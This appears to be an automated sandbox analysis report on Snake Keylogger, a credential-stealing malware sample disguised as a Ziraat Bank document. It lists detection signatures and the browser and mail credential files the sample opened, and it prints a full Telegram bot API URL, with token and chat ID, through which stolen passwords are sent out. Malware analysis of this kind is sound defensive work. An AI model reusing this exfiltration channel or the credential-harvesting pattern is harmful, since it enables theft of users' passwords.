Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4154364843.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4154364843.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519312 Sample: ziraat bankasi_TRY M#U00fc#... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 2 other IPs or domains 2->26 34 Suricata IDS alerts for network traffic 2->34 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 44 10 other signatures 2->44 8 ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe 4 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 file5 20 ziraat bankasi_TRY... 26.09.2024.exe.log, ASCII 8->20 dropped 46 Adds a directory exclusion to Windows Defender 8->46 12 ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 28 api.telegram.org 149.154.167.220, 443, 49756, 49757 TELEGRAMRU United Kingdom 12->28 30 reallyfreegeoip.org 188.114.96.3, 443, 49735, 49737 CLOUDFLARENETUS European Union 12->30 32 checkip.dyndns.com 193.122.6.168, 49733, 49738, 49740 ORACLE-BMC-31898US United States 12->32 48 Moves itself to temp directory 12->48 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 conhost.exe 16->18         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake true
  • Avira URL Cloud: safe
 unknown